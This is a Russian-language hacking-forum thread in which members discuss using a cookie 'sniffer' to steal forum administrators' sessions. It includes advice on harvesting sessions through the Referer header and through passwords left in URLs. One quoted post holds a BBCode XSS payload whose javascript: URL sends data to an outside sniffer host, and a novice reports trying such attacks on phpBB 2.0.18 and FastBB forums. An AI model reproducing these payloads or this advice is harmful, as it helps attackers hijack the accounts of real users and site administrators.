Форум АНТИЧАТ - Простой вопрос про сниффер

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

- - Простой вопрос про сниффер (https://forum.antichat.xyz/showthread.php?t=13602)

Простой вопрос про сниффер

Народ, такой вопрос:
Сниффером мы можем получать куки. Но только куки того процесса, где был выполнен Джаваскрипт. Следовательно, для использования сниффера, в любом случае требуется искать уязвимость, пропускающую Джаваскрипт?
Тогда не очень ясен один вопрос - в статье про снифферы на Античате, неточно помню, был описан такой прием получения админских куков на форуме, как просьба посмотреть неоткрывающийся аватар (в котором сидит Js). Админу дается ссылка, и просится на нее зайти.
Но вель тогда сниффер получит куки, которые относятся к новому открытому документу - странице с картинкой, и толку от этого никакого.
То есть, главный вопрос:
Можно ли как-нибудь использовать сниффер, если нет уязвимостей, пропускающих Js?

Цитата:

Сообщение от errou

Народ, такой вопрос:
Можно ли как-нибудь использовать сниффер, если нет уязвимостей, пропускающих Js?

Можно, его использовать для получения реффера (тоесть адреса, с которого зашел чел на сниффер). Так можно воровать сессии. А бывают и такие чаты, или еще ченить, где в дресе пишется
http://site/chat/?userId=1234&room=3&pwd=qwerty
Из этой строки можно узнать пароль ))))))))))))))))))))))

чтобы не создавать тему спрашиваю здесь....

когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt???

очень важно, а то у меня ни разу не получалось получить файл...а точнее куки....
сасое большое, что я получаю, это ip адрес...

Цитата:

Ха-ха-ха-ха.... Я ща умру от смеха))))
Где ты в JS видел такое??? Например:

Код:

[HT*ML][co*lor=white][EM*AIL][U*RL=wj`=`][/URL][/EMA*IL][/color]` style=`background:url(javascript:document.images[1].src="http://s.netsec.ru/nofear/pic.gif?;"+админ@yandex.ru.txt)`

Если это щас увидят знающие люди, они сдохнут со смеха )))

Мдаааааааааа!!!

Цитата:

Сообщение от ZetRoX

когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt???

Ты вообще сам понял, что спросил! И че ты надеялся получить если бы ты написал вместо document.cookie -
админ@yandex.ru.txt. Немного подумав я сделал вывод что ты видимо хотел получить некий файл админ@yandex.ru.txt или файл админа с yandex.ru под названием yandex.ru.txt, ХА ХА ХА!!! ОБЛОМИСЬ ИМХО!!! =)

Цитата:

Сообщение от ZetRoX

очень важно, а то у меня ни разу не получалось получить файл...а точнее куки....

Ну и не получиться!

Цитата:

Сообщение от ZetRoX

сасое большое, что я получаю, это ip адрес...

Честно говоря с первого раза я не понял этого предложения =).
Поверь мне ты получишь не только ip адресс, хотя..... наверное ТЫ ничего не получишь.....

УЧИ МАТ ЧАСТЬ, ИМХО!!!!!!!!

СДОХНУТЬ МОЖНО!!!!!!!!!!)))))))))))))))))))))))))))))) )))))))))))))))))))))))))) ну и ЛОЛЛЛЛЛЛЛЛЛ

когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt???
http://www.azerilove.net/chat/converts/20.gif

ну хорошо, лоханулся....

а в чем тогда проблема??? я даже на себе проверял.....пишу я нужный код, с помощью кодера (ну, ссылки на них где-то давали).....в сообщении оставляю ссылку, сам кликаю и на снифак приходит только Ip адрес жертвы....

что делать....ну помогите начинающему...все же когда-то были такими....

НА чем ты тестишь? НА форуме? Движок и версия какая?

да на форумах.....phpbb 2.0.18 или fastbb (версию не помню, но не самаЯ последняя, где-то предпоследняя...)